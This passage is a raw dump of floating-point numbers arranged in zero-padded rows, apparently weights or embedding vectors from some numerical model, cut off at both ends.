0.430265, 0.128952, -0.564562, 1.94266, 0.465259, 0.0199097, -0.254367, 0.303566, -1.42133, -2.82355, -0.0309917, -0.445566, -2.62343, 1.12455, -1.96585, 0.0194018, -0.435638, 0.0323872, 0.137836, 2.01299, -0.119152, -0.0357685, -0.52612, -0.494889, 0.362265, -0.471987, 0.351038, 0.506195, 0.00873942, 0.460577, 0.114337, -1.79841, -0.0210329, 0.285732, 0.0866808, -0.0427738, 0.419651, -5.44934, -0.03758, 0.164647, 0.567569, 0.786496, -0.0445705, 0.0246402, 1.84533, -1.12015, -0.0437157, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0882252, -1.32797, -0.116958, -0.347048, 0.169114, 0.0446385, -2.62635, -1.48754, 0.00489798, -0.32866, -0.0790013, 0.2238, -0.693589, 0.0252846, 0.506258, -0.0537526, 0.9992, -0.775884, 0.000928232, 0.0663224, -0.0288892, 0.177885, 0.345041, -0.355451, 0.00437184, -0.887209, 0.800238, -0.261547, -0.627339, -0.00710077, -0.085518, 0.00781268, 1.07369, -0.903241, -0.685605, -0.00852319, 0.195908, 0.404549, 0.462221, -0.310193, 0.638543, -0.0296251, -0.840895, 0.272721, 1.28778, -0.0406326, -0.0350067, -0.677412, 0.319501, 0.078329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0785793, 0.656655, -0.0437748, -0.383361, -0.246312, 0.289451, 0.332798, -1.50324, -0.0102523, 0.276219, -0.472762, -0.735907, 0.120646, -0.0371877, -0.0424048, 0.394455, 1.0903, -0.484042, 0.03291, 0.113202, -0.0146975, 0.38649, 0.395473, -0.187295, -0.00428256, -0.70834, -0.485119, -0.221118, 0.0996368, 0.497876, 0.371384, 0.474982, -0.0660763, -1.97237, -0.805604, -0.00967591, 0.522409, -0.131838, 0.0737433, -0.774565, -0.846341, 0.0177552, 0.26113, 0.643962, -0.248758, -0.0270562, -0.0377851, 0.211813, 0.191006, 0.0287498, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.336649, 0.582675, -0.547241, 0.612236, -0.804722, 0.076911, 0.0105915, 0.236957, 0.00479869, 0.882405, 0.36482, -0.627184, 0.0966428, 0.00449299, -0.329954, -1.81632, 0.113273, 1.20684, -0.00426641, 0.118562, 0.0409238, 0.591463, -1.38729, -0.318357, 0.080556, 0.0384083, -0.388941, 0.568035, 0.206238, 0.339593, 0.0747242, -0.0506501, -0.311877, -0.591518, 2.18751, -0.0285278, 0.278364, -0.490317, 0.97008, 0.450659, -1.45557, -0.00643204, 0.24366, 0.213589, -0.28788, 0.0108733, -0.0423052, -0.3664, -0.113991, 0.304281, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.187061, 0.368075, 0.402721, 0.0432532, 0.591196, -0.341224, 0.283519, 0.00788303, -0.00491087, -0.215448, -0.159826, -0.217083, -0.668635, 0.020692, 0.0721342, -0.0762838, 0.469106, -0.712977, 0.0289011, -0.0880809, 0.0445102, -0.547157, -0.0599692, -0.0843311, 0.139699, 0.306879, 0.0446426, -0.0265966, -0.0781866, -0.277161, -0.217242, -0.193597, 0.250581, -0.130119, 1.06178, 0.0564953, 0.531418, -0.290363, 0.628557, 0.0690643, -0.484076, -0.0311047, 0.764387, -0.0655707, -0.0112397, -0.0260667, 0.0109074, 0.683062, 0.0233097, -0.317873, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.128827, 0.539061, 0.0477117, 0.329448, -0.173768, 0.432161, -0.861211, -0.104342, 0.0470841, -1.22939, -1.09594, -0.871845, 0.0729053, 0.0233787, -0.896199, 0.830081, -0.418109, -0.461961, 0.0437496, 0.74729, -0.0150529, 0.186476, 0.985325, -0.186247, 0.167154, 0.1453, -0.0598934, 0.713923, 0.0744902, 0.238308, -0.997695, -0.173058, 0.405312, -0.556357, 1.37117, 0.0191262, -0.308385, 0.15783, 1.31513, 0.365477, -6.19472, 4.5306e-05, -0.160771, -0.26761, 0.392842, -0.0465553, 0.0244071, 0.192473, 0.148322, -0.283001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.0955, 1.06141, 0.775136, 0.0500249, 0.2557, -0.420256, -0.62232, 0.437431, 0.0340021, 0.404638, 0.442831, 1.18903, 0.5981, 0.0056831, 0.0524798, 0.240292, -0.324635, 0.793153, 0.0213524, 0.131455, -0.00033942, -0.696461, -0.138679, 0.984568, -0.0206788, 0.20673, -0.157852, -0.54439, 0.626833, -0.244234, 0.116795, -0.299775, 0.913311, 0.668854, -0.661695, 0.037665, 0.0409673, 0.0382783, 0.689162, 0.168678, 0.187331, 0.0320525, 0.000326555, -0.367406, -0.71026, -0.0273826, 0.0195486, 0.719728, 0.065834, -0.0104509, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.15697, 1.2807, 0.216626, -2.21813, -1.40401, -0.724192, 0.207941, 0.422454, 0.0407849, -1.31081, -3.83068, -4.68372, -5.41868, -0.0459739, -0.0246873, -0.110887, 0.0631534, 0.875744, -0.0304091, 0.16902, 0.00953614, 0.141132, 0.155546, -0.289232, -0.00695966, 0.15113, 0.935561, -0.159879, 0.177744, 0.000598769, -1.2286, 0.286781, 0.65619, -1.09572, -0.95041, -0.0255265, 0.58012, 0.042113, 0.785399, 0.133714, -0.43335, 0.000392373, 0.541993, 0.14331, 0.971585, -0.00959936, -0.0266763, -4.33728, -0.3051, -0.0873396, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.244738, -0.196512, 0.397359, -0.0485348, -1.32869, 0.144963, 0.239849, 0.424593, 0.0493175, -0.0453742, 0.0202106, 0.354312, -0.419771, -0.0285839, -0.0905183, 0.105743, -0.066927, -0.197359, 0.0126538, -0.199059, -0.000937175, -0.37787, -0.117616, -0.0707187, 0.095812, 0.414536, 0.219019, -0.29525, -0.157299, -0.2223, -0.138491, -0.0366178, 0.352021, 0.207227, 0.873583, 0.0410201, 0.156992, -0.135961, 0.173648, -0.548074, -0.111317, -0.0507218, 0.00123618, -0.136681, -0.0703295, -0.00258926, 0.0398867, 1.55645, -0.117505, -0.0437594, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0497862, 0.0435227, -0.0386273, 0.020912, 0.0219009, -0.0229396, -0.0134445, -0.0167988, 0.0459024, -0.0496992, -0.0487329, -0.00741481, -0.0225579, -0.0115603, 0.0233811, -0.00403145, -0.0030833, -0.022211, -0.0152924, -0.0444175, 0.0455997, -0.0414906, -0.0322587, -0.0460335, -0.0373264, -0.0220059, -0.0186788, -0.0334518, -0.0273248, 0.00613856, 0.0278506, -0.045371, -0.0363645, -0.0417711, 0.0257293, -0.044696, 0.0421258, 0.039697, -0.0346385, 0.0367138, 0.0186013, -0.00180238, 0.0116125, -0.0370684, -0.0394582, -0.0260946, 0.0371131, 0.0260805, 0.0232208, -0.0249248, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.347322, -0.731373, 0.920001, -0.546438, -0.183528, -0.205864, -1.04673, 0.244728, -0.00455609, -0.41089, -0.377605, 0.0715986, 1.22834, 0.0152072, 0.61723, -0.30643, 0.195723, -0.331579, 0.0382495, 0.177771, -0.0344587, 0.48378, 1.32859, -0.185908, -0.022025, -0.730959, 0.280518, -0.00288165, -0.0245441, -0.173674, -0.240854, -0.246401, -0.0242383, -0.0893153, 0.388881, 0.0279071, 0.58997, 0.345775, 0.0556246, -0.24366, -0.132058, 0.0248003, 0.522833, 0.27646, -0.275803, 0.0393865, 0.00958102, -0.35121, 0.20508, 0.0334523, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.102778, -0.144084, -0.0255408, -0.0694006, 0.597415, 0.0178127, -0.457013, -0.693316, 0.0168571, -0.387994, -0.0322543, -0.26452, -0.185211, -0.0232095, 0.217817, -0.545474, 0.289732, -0.999481, 0.0336787, 0.255047, 0.00241457, 0.340488, 0.688666, 0.0742035, 0.00369556, 0.452634, -0.00240148, -0.21517, 0.203332, 0.40372, -0.175661, 0.0490156, -0.468339, 0.673909, -2.02232, 0.00822716, 0.320597, -0.469309, 0.325946, -0.355309, 0.638437, -0.0097445, 0.304382, 0.301432, -0.737027, 0.0326333, 0.0400533, -1.67222, -0.217986, -0.0174546, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.165099, -0.448869, 0.0304884, 0.259594, 0.0528963, -0.11761, -0.806309, 0.533244, -0.0409291, -0.468568, 0.300563, -0.415004, 1.06198, -0.0389055, -0.163219, 0.231731, -0.0836972, -0.0398799, -0.000119452, 0.434045, 0.0282674, 1.04261, 0.0605663, 0.28312, -0.00196736, 0.25906, -0.280295, -0.434107, -0.0851982, 0.439024, 0.143247, 0.287579, -0.283536, 0.462034, -0.682226, 0.00415039, 0.643868, 0.0155157, 0.197235, 0.64925, -0.63204, 0.00151188, -0.328364, -0.147557, -0.0365489, 0.0068099, 0.0311527, -1.14938, -0.821776, -0.664148, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0421204, 0.0508308, 0.0227831, 0.242589, -0.0987932, 0.0696135, -0.379262, -0.297804, 0.0206691, -0.320476, -0.14999, 0.237486, 0.0145184, -0.0212497, -0.0281091, -0.214931, 0.187985, 0.47702, -0.0102312, 0.113772, -0.029721, -0.343021, -0.285966, -0.128818, 0.143064, -0.185982, -0.0622983, -0.293839, 0.00923924, -0.0624027, -0.167353, -0.00996726, 0.58715, -0.2385, -0.490625, -0.00697588, -0.242208, 0.116544, 0.318555, -0.0830264, -0.12998, 0.0203683, -0.116774, 0.0976717, 0.263925, 0.00527523, 0.0246692, 0.264439, -0.260266, -0.105161, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.014906, 0.0232007, -0.0421895, 0.00229284, 0.0192415, 0.00101475, -0.037026, -0.0210529, -0.0492675, 0.027691, -0.0352615, 0.0360088, 0.0183332, -0.0209571, 0.0155321, -0.0452339, -0.0014726, 0.00271982, -0.043623, -0.05214, -0.00651164, -0.0313214, -0.0233647, -0.0550527, -0.0451922, 0.002555, -0.0490179, 0.0120124, -0.0552485, -0.0122098, 0.0403779, -0.0490645, 0.0188405, -0.0415989, 0.0475779, 0.0327441, 0.0172664, -0.0052262, 0.0333664, 0.0244404, 0.0450005, 0.0284483, -0.0106163, -0.0174149, -0.0451442, 0.00603611, -0.0429305, 0.018425, -0.0382688, -0.0259022, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.120012, -0.239937, 0.482217, 0.719209, -0.296448, -0.396529, 0.0388696, -0.0713034, -0.0211136, 0.0875739, -0.0177673, 0.132792, -0.0545189, -0.00980334, -0.310505, 0.59264, -0.186393, 0.328743, 0.0415384, -0.00979186, 0.041988, 0.159757, 0.210988, -0.0138613, -0.0331991, -0.0399854, 0.523528, 0.104616, 0.15978, -0.0583307, -0.204347, -0.184642, -0.0916539, 0.249763, -1.15255, 0.0387355, -0.146595, -0.0564492, -0.197494, -0.0501543, 0.118834, 0.0408129, -0.0927442, 0.181708, -0.123428, 0.000476206, -0.0307574, 0.392281, 0.257402, -0.0499875, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.112557, 0.0197274, 0.700642, 0.183221, -0.665623, -0.640259, -1.68136, 1.52724, 0.0262252, -0.435643, -0.0611323, 1.33106, -0.621827, -0.0177039, 0.414786, -0.0890711, -0.931589, -0.627157, -0.0365978, -0.449838, 0.0257274, 0.185007, 0.192847, -0.0730913, -0.0409926, -0.0106481, 0.904727, 0.167239, -0.0691091, -1.14248, -0.804827, 0.0573134, 0.32731, 0.689998, 0.0510679, 0.00354496, -0.185015, -0.0815219, -0.137485, -0.894445, 1.50434, -0.0163807, -0.0045482, -0.626803, 0.155801, -0.0497264, -0.0286393, -0.612893, 0.771677, 1.02813, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0104661, -0.57479, -0.349557, -0.163706, -0.386321, 0.286461, -0.563309, 0.719485, 0.037069, -0.324657, 0.052107, -0.0138602, 0.460887, -0.0547167, -0.464994, 0.188661, -0.212769, -0.652777, -0.0394646, 0.194121, -0.0467133, 0.386147, 0.46492, -0.0784183, -0.0347684, 0.354735, -0.355225, 0.340553, -0.209908, -0.00553827, 0.361767, 0.692941, -0.408353, -0.266632, -0.405946, -0.00647409, 0.277956, 0.650823, -0.435032, -0.0354302, 0.674537, -0.00481483, 0.46653, -0.0952742, 0.091073, 0.0344903, 0.0542764, -0.214096, -0.000226258, 0.529179, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.152818, 0.336836, 0.144301, -0.60173, -2.1598, 1.15333, -1.25077, -1.80169, 0.0470879, 0.915706, -0.75947, -1.01605, -0.517285, 0.0115814, 0.557733, 0.762249, 1.49474, -0.517578, 0.0054294, 0.0694014, -0.0479392, -0.58181, -0.543352, -0.27979, 0.0698662, -0.911295, -0.824071, -0.213848, -0.0859593, 0.312886, -0.719552, 0.0437872, -0.588228, -2.13608, 0.300612, -0.00355992, 0.0331123, -0.429713, -0.408712, 0.308681, -0.583358, -0.0309197, 0.705046, 0.499835, -0.397074, 0.0182716, 0.010489, -0.113226, 0.525577, -0.926685, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.664345, 0.918003, 0.364648, 1.06381, 0.444586, 0.646712, -0.646267, 1.26364, 0.00775087, -1.74571, -0.199117, 1.48701, 0.312847, -0.0239272, 1.09808, 0.00431516, -0.0290235, 1.31588, -0.00076269, 0.201039, -0.00782709, 0.477719, 1.27135, -0.0945048, 0.0955153, 0.288933, -0.1991, 0.117478, -0.535567, -0.10504, 1.03552, -0.126115, -0.495199, 0.869573, -1.76373, -0.0466754, 0.793781, -0.12449, 1.48639, -0.676636, -2.09958, 0.000330048, -0.0823006, -0.239568, 0.927832, 0.032622, 0.00639042, 0.62815, 0.59099, 0.464836, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.371656, 0.0729074, -0.15079, 0.086222, -0.258871, 0.0568565, -0.201894, 0.0748844, -0.0399964, -0.0180527, -0.0652496, 0.181679, 0.118906, -0.0099284, -0.0124305, 0.174161, -0.151265, 0.481326, -0.0245537, 0.188708, -0.016705, 0.40055, 0.0494264, 0.508403, 0.00968129, 0.152474, -0.133777, 0.510712, 0.639419, 0.0504993, 0.119014, -0.250586, 0.342326, -0.354039, 1.09073, 0.0219339, 0.0587251, 0.0625257, 0.367626, -0.270117, -0.447799, -0.0382394, -0.406174, -0.00297169, 0.434272, -0.0252771, -0.0293484, -0.580727, -0.117415, -0.0341489, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.097957, -0.108667, 0.173487, 0.0262305, -0.67184, 1.57681, 0.163901, -0.134677, 0.0296796, -0.317427, -0.0970607, -0.583567, 0.571512, -0.00473082, -0.628496, 0.988523, 0.376362, -0.656828, -0.0267865, 0.602271, 0.0274699, 1.18114, 1.60969, -0.106471, 0.0349525, 1.12613, -0.726539, 0.347225, -0.145112, 1.41626, 0.189626, 0.299199, 0.00311092, -0.431197, -0.905033, 0.0275515, 0.349774, 0.143755, 0.00058625, 0.919095, -0.891115, -0.0350427, 0.02246, 0.707076, -0.0767925, -0.00899226, -0.0434743, -0.151372, -0.633945, -0.596201, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.79254, -0.53108, -0.355535, 0.490386, 0.149727, -0.252135, -0.00674967, 0.970254, 0.0293762, -0.925135, 0.320923, 1.16313, -0.253996, 0.00211817, -0.89504, -0.29809, -0.581007, 0.130587, -0.0253456, 0.0581313, 0.00306063, 0.674935, -0.665225, -0.472059, -0.0179954, -0.765101, -0.0796857, 0.0547511, 0.141723, 0.418252, 0.02975, 0.232487, -0.734614, 0.858747, -2.34432, 0.003939, 0.111983, 0.326839, -0.0936272, 0.0250145, -0.150727, -0.0223693, -0.548725, -0.495037, 0.28183, 0.0101745, -0.000659784, 0.937062, -0.224708, 0.40149, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.995124, -0.479951, -0.605316, -0.0854287, -0.927684, 0.113679, -0.516473, -0.392544, 0.0181165, -0.472579, -0.523514, -0.492673, 0.42592, -0.050793, 0.484923, 0.517631, -0.00440341, 0.165548, 0.029631, -0.306851, -0.044285, -0.80855, -0.861889, 0.275118, 0.0120566, -0.236852, -0.539186, 0.280588, 0.320842, -0.40198, -0.35291, -0.330626, 0.299637, 0.117169, 0.0743303, 0.0234753, -0.197718, 0.0994273, 0.147637, -0.648323, 0.78347, 0.0106761, -0.212044, -0.191767, 0.055786, -0.0136898, -0.0193105, -0.854537, 0.65414, 0.0360536, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.946175, 0.663142, 0.123494, -0.0025984, 0.183861, -0.248596, 0.406707, 0.846746, -0.0456627, -0.805682, 0.336541, 0.514174, 1.13627, 0.0140341, 0.178093, -0.857201, -0.41955, 0.0258105, -0.015725, 0.372254, 0.0378651, -0.996768, 0.0865944, -0.468885, -0.0104388, 0.275206, 0.0881984, 0.290413, -0.0762469, -0.405834, 1.20486, 0.0652548, 0.523827, 0.508187, -3.4686, -0.0199247, 0.051613, 0.441094, -0.345916, 0.0337958, 0.479906, -0.0355347, -1.04343, -0.472257, -0.522299, 0.00932301, -0.0502567, 1.32858, 0.428189, 0.583258, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.450054, 0.140606, -0.2783, -0.300913, -0.578471, -0.0575203, 0.055184, 0.00346404, 0.0312428, 0.221119, 0.0712621, -0.407903, -0.217463, 0.018883, -0.17991, -0.27029, 0.13348, 0.22478, -0.0394242, -0.0571733, 0.0180931, 0.140644, 0.260784, 0.222296, 0.101704, 0.198339, 0.0819407, 0.0943845, -0.429599, -0.198418, -0.42386, -0.0961622, -0.0332791, -0.0615376, 0.559515, 0.0214343, 0.155784, -0.0713667, 0.204222, 0.0536225, -0.020165, -0.0489411, 0.0292133, -0.136512, 0.410923, 0.0283761, -0.0498177, -0.77216, -0.180451, -0.0889349, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.312342, -0.391429, 0.261905, -0.00645419, -0.242703, 0.0820002, 0.159221, 0.285375, -0.0174987, -0.27332, -0.0317259, 0.136816, 0.42158, 0.0151467, -0.0565131, -0.0695457, -0.0377536, -0.148152, -0.0434048, 0.0920293, 0.0196925, 0.353066, -0.0751582, 0.0609769, 0.136909, -0.006616, -0.109592, 0.333964, 0.343872, 0.0392573, 0.325558, 0.0643591, 0.620381, 0.0757577, 0.608915, 0.0309398, 0.229132, 